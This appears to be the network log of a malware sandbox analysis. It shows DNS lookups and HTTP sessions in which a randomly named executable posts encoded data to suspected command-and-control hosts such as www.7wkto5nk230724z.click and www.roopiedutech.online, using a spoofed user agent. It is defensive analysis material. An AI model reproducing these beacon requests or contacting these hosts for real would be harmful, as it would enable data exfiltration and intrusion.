                                                                                                                      Nov 1, 2024 09:20:49.147475958 CET8062942199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:49.147625923 CET8062942199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:49.147633076 CET6294280192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:49.147697926 CET6294280192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:49.151361942 CET6294280192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:49.156243086 CET8062942199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:54.793437004 CET6294380192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:20:54.798284054 CET8062943103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:54.800436974 CET6294380192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:20:54.826970100 CET6294380192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:20:54.831895113 CET8062943103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:56.334842920 CET6294380192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:20:56.340203047 CET8062943103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:56.340262890 CET6294380192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:20:57.356167078 CET6294480192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:20:57.361100912 CET8062944103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:57.365080118 CET6294480192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:20:57.385008097 CET6294480192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:20:57.389843941 CET8062944103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:58.897358894 CET6294480192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:20:58.902918100 CET8062944103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:58.903022051 CET6294480192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:21:00.952436924 CET6294580192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:21:00.957478046 CET8062945103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:00.957554102 CET6294580192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:21:00.969888926 CET6294580192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:21:00.974813938 CET8062945103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:00.974843025 CET8062945103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:00.974885941 CET8062945103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:00.974922895 CET8062945103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:00.974946022 CET8062945103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:00.975059986 CET8062945103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:00.975083113 CET8062945103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:00.975128889 CET8062945103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:00.975164890 CET8062945103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:02.477010965 CET6294580192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:21:02.482379913 CET8062945103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:02.482613087 CET6294580192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:21:03.845685005 CET6294680192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:21:03.850677967 CET8062946103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:03.850806952 CET6294680192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:21:03.859931946 CET6294680192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:21:03.864804029 CET8062946103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:05.510509968 CET8062946103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:05.553473949 CET6294680192.168.2.4103.233.82.58
                                                                                                                      Nov 1, 2024 09:21:05.748033047 CET8062946103.233.82.58192.168.2.4
                                                                                                                      Nov 1, 2024 09:21:05.748090029 CET6294680192.168.2.4103.233.82.58
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                      Nov 1, 2024 09:19:15.985133886 CET1.1.1.1192.168.2.40xde44No error (0)44kdd.top38.47.232.160A (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:19:31.539635897 CET1.1.1.1192.168.2.40xa259No error (0)www.dbasky.net34.92.109.131A (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:19:31.539650917 CET1.1.1.1192.168.2.40xa259No error (0)www.dbasky.net34.92.109.131A (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:19:45.366729021 CET1.1.1.1192.168.2.40x4c96No error (0)www.zoptra.info162.0.211.143A (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:19:58.967679024 CET1.1.1.1192.168.2.40x347dNo error (0)www.nutrigenfit.onlinenutrigenfit.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:19:58.967679024 CET1.1.1.1192.168.2.40x347dNo error (0)nutrigenfit.online195.110.124.133A (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:20:12.841270924 CET1.1.1.1192.168.2.40xfb93No error (0)www.redex.fun185.68.16.94A (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:20:27.071042061 CET1.1.1.1192.168.2.40x43abNo error (0)www.broork.sbs163.44.176.12A (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:20:40.823836088 CET1.1.1.1192.168.2.40xe3dfNo error (0)www.deepfy.xyz199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:20:54.779886007 CET1.1.1.1192.168.2.40x59cdNo error (0)www.cmdh1c.xyzofficial.roamimg.strawberrycdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Nov 1, 2024 09:20:54.779886007 CET1.1.1.1192.168.2.40x59cdNo error (0)official.roamimg.strawberrycdn.com103.233.82.58A (IP address)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 62633 | 3.33.130.190 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:17:51.431792974 CET | 527 | OUT | GET /a1y9/?xZa=jpgDOVH8PXW8oBA0&sn0PLN=iZz4I3W5iLJGfbtGmZ2CObwfByBiroJddzdGuVUGr5fdVP/mU/ghPDmzUyOVJzAbJgU0ueO9BFeqSkyyfz76yiSG65EDj9rJsjZ/uDCtsUVT8Sp7eRbdwLE= HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.litsgs.vip
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Nov 1, 2024 09:17:52.985616922 CET | 403 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: openresty
                                                                                                                      Date: Fri, 01 Nov 2024 08:17:52 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 263
                                                                                                                      Connection: close
                                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?xZa=jpgDOVH8PXW8oBA0&sn0PLN=iZz4I3W5iLJGfbtGmZ2CObwfByBiroJddzdGuVUGr5fdVP/mU/ghPDmzUyOVJzAbJgU0ueO9BFeqSkyyfz76yiSG65EDj9rJsjZ/uDCtsUVT8Sp7eRbdwLE="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 62694 | 172.67.131.32 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:18:08.061456919 CET | 811 | OUT | POST /c2q3/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.7wkto5nk230724z.click
                                                                                                                      Origin: http://www.7wkto5nk230724z.click
                                                                                                                      Referer: http://www.7wkto5nk230724z.click/c2q3/
                                                                                                                      Content-Length: 203
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN=u9cGq9OyFpd1FYVZtYYNmQwJm5jsjzugyLJfkkBPyPscCW1tUo1tsSPROYdR/cGawwxZO7YQtb+sR71R1Z5xd0L6htYjXA0WBWCsw3wtymakfvsz0ukgUAsoOujLWDq1EhFqzyjMMDrtvRstXmo+WABKUrN4nWL51PQKjgg3Qa4LlBdqkhpWEgSS3DwAf9Cy+g==
Nov 1, 2024 09:18:08.753097057 CET | 797 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Fri, 01 Nov 2024 08:18:08 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6qwz%2F9cMho692HHhfSsYXNYedg5oMgLa6LGMSoRh%2BGZPzwY8fJEjexmpmjQFVeKGq3AcIDUAit2DjHuM1w3Uko3Zj0%2FeSV2YVIy0dM33dOwEVL2XciBb1VeojOGNnGpNEBdWmDZXlU5QG5SX"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8dba73d3aa426bd2-DFW
                                                                                                                      Content-Encoding: gzip
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1131&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=811&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 62710 | 172.67.131.32 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:18:10.603519917 CET | 831 | OUT | POST /c2q3/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.7wkto5nk230724z.click
                                                                                                                      Origin: http://www.7wkto5nk230724z.click
                                                                                                                      Referer: http://www.7wkto5nk230724z.click/c2q3/
                                                                                                                      Content-Length: 223
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN=u9cGq9OyFpd1F5FZu/sNkwwO4pjssTukyLFfkl0Ex9IcBzRtVsZt5SPRG4dJ18GBww0kO6kQtb6sR+ZR1uVwPUKc09ZFYg0WBWCsw31lymikffcz3MMnagsnGOjLcjqxEhFYzwXmMFntvQctUzc/YABEaLM0oWuj1+VlnjlXdaoOgHQw1QIBWg2hqE50S+/7lo0r3T3uqaEbmlIkWK0MnSU=
Nov 1, 2024 09:18:11.271150112 CET | 803 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Fri, 01 Nov 2024 08:18:11 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EdwCCaDy487UPnK0%2BGuRiSu6SDyj8p7yfiZVef6pMZRhenlKR%2BYs70%2B6O73FMIBG71Qlbg4sjiMqIrdRPG%2FrZD%2BSNUHoQg5%2FH6D05STBYE0ZZDmy8Rk0TIumR2phO8BKBWrdfy5WtZ0us2XL"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8dba73e389eb461a-DFW
                                                                                                                      Content-Encoding: gzip
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1728&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=831&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 62726 | 172.67.131.32 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:18:13.150916100 CET | 10913 | OUT | POST /c2q3/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.7wkto5nk230724z.click
                                                                                                                      Origin: http://www.7wkto5nk230724z.click
                                                                                                                      Referer: http://www.7wkto5nk230724z.click/c2q3/
                                                                                                                      Content-Length: 10303
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Nov 1, 2024 09:18:13.849462986 CET | 903 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Fri, 01 Nov 2024 08:18:13 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8RA%2FLffMnzwoLayDK0zaK%2F7WsIs%2F0tR3hjjKdxMjZLumfZAZa2tnPYmRysmVBIEceFE%2Fqd1Y2zf6GHzfdx32LFXUHcTHQLOTkirnuFvpgjcr0HzbHbRuVVTTyTOxl2dfd%2FxTW2PIgYTd3cop"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8dba73f37ef86bc2-DFW
                                                                                                                      Content-Encoding: gzip
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=944&sent=5&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10913&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      4 | 192.168.2.4 | 62737 | 172.67.131.32 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Nov 1, 2024 09:18:15.765502930 CET | 538 | OUT | GET /c2q3/?sn0PLN=j/0mpNm2Bsp7DIZ0lL93uSEy3O7+v2qbjKVTngZW+fxoFlp5b+1ximLQJstL0djCplBlCo8niZKHcOIqzu0BFGSn0M5MS0dRMByh0HJ4/jaoTuMehM4oDS0=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.7wkto5nk230724z.click
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Nov 1, 2024 09:18:16.414262056 CET | 908 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Fri, 01 Nov 2024 08:18:16 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C0W6XyshX0KiHwYowSrAyRyzeAHishgVefMvUPUNVT9GX7Vr9iceEMCflrliOG8oJIB3O23QUgWPTMBYjoM7j%2FOaUpM8AAP3ikPz6O8nLBHYB4Wdbl1geA1Bv47Wa9CW3ze7w23CMkF%2B4QYr"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8dba7403992a2e78-DFW
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1328&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=538&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                      Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      5 | 192.168.2.4 | 62773 | 103.191.208.137 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Nov 1, 2024 09:18:22.172318935 CET | 805 | OUT | POST /w5is/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.roopiedutech.online
                                                                                                                      Origin: http://www.roopiedutech.online
                                                                                                                      Referer: http://www.roopiedutech.online/w5is/
                                                                                                                      Content-Length: 203
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN=KZqAPL06OI9OyKh2fxGbCJrjWz4jQSDFM7+2YI9bmVDviWfu4C8+XidLVvG8mzzm6BYLJtZz3ayO8C/fw19h5dNMoPJ7hKq0w+Ta6nvT90zwRFy/GyndYdwQdmr1/a3DrJw85CWgWH77qUt4TQdfn1vXgqsmHixj6ujmpNY1PPea3BIMWzvtE5ldYjIvBbBkYA==


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      6 | 192.168.2.4 | 62789 | 103.191.208.137 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Nov 1, 2024 09:18:24.710556984 CET | 825 | OUT | POST /w5is/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.roopiedutech.online
                                                                                                                      Origin: http://www.roopiedutech.online
                                                                                                                      Referer: http://www.roopiedutech.online/w5is/
                                                                                                                      Content-Length: 223
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN=KZqAPL06OI9Oyul2cQGbX5rgIj4jayDJM7y2YJoGmjTvi03u5Hc+QidLdPG5rTzt6Bd2JpRz3a2O8A3fzE9m4NNC9/J5vqq0w+Ta6mPp90rwR0C/cTnSEtwTKWr17a3frJwC5HOeWB/7qVd4TBdcp1vRvKtSWwYZ87udhswiENK72HFWHCO6W5BuFkBbMY8tDDXno/JyS9qkMFzr/QAaKOk=


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      7 | 192.168.2.4 | 62805 | 103.191.208.137 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Nov 1, 2024 09:18:27.305403948 CET | 10907 | OUT | POST /w5is/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.roopiedutech.online
                                                                                                                      Origin: http://www.roopiedutech.online
                                                                                                                      Referer: http://www.roopiedutech.online/w5is/
                                                                                                                      Content-Length: 10303
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      8 | 192.168.2.4 | 62821 | 103.191.208.137 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Nov 1, 2024 09:18:29.849773884 CET | 536 | OUT | GET /w5is/?xZa=jpgDOVH8PXW8oBA0&sn0PLN=HbCgM9YcBMttwdZrXhLlY5z1HFkNRQK7DIvCaf9ftWyGunbQ91oOdhxta7T/vCia7UhAH45R/qaSwn7axWhs9/xB9a8/qr3Kz4jMxTKXhFTKb3+4TwbOFdg= HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.roopiedutech.online
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Nov 1, 2024 09:18:31.925614119 CET | 523 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                      Connection: close
                                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                      x-redirect-by: WordPress
                                                                                                                      location: http://roopiedutech.online/w5is/?xZa=jpgDOVH8PXW8oBA0&sn0PLN=HbCgM9YcBMttwdZrXhLlY5z1HFkNRQK7DIvCaf9ftWyGunbQ91oOdhxta7T/vCia7UhAH45R/qaSwn7axWhs9/xB9a8/qr3Kz4jMxTKXhFTKb3+4TwbOFdg=
                                                                                                                      x-litespeed-cache: miss
                                                                                                                      content-length: 0
                                                                                                                      date: Fri, 01 Nov 2024 08:18:31 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      vary: User-Agent


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      9 | 192.168.2.4 | 62903 | 3.33.130.190 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Nov 1, 2024 09:18:45.297033072 CET | 775 | OUT | POST /mgme/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.suree.bet
                                                                                                                      Origin: http://www.suree.bet
                                                                                                                      Referer: http://www.suree.bet/mgme/
                                                                                                                      Content-Length: 203
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN=6njfiHd/8RikZq09fsmUGEaNR3Lvq3VNs1kh9Sg7dd65pk7vNtmg/uOOtUVsI9/wUe/XDVi99mXG0znBm5PHDtST3jh1LD1Yw2V05wFTS/oIMJS9YvaXEjBtSlGedoNRld5r23Utel0EJr+FgFtKoW4XMpQ812FVxZwJWDxkKtug5wPrjCQypMVal6cKyVt1dw==


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      10 | 192.168.2.4 | 62908 | 3.33.130.190 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Nov 1, 2024 09:18:47.840290070 CET | 795 | OUT | POST /mgme/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.suree.bet
                                                                                                                      Origin: http://www.suree.bet
                                                                                                                      Referer: http://www.suree.bet/mgme/
                                                                                                                      Content-Length: 223
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
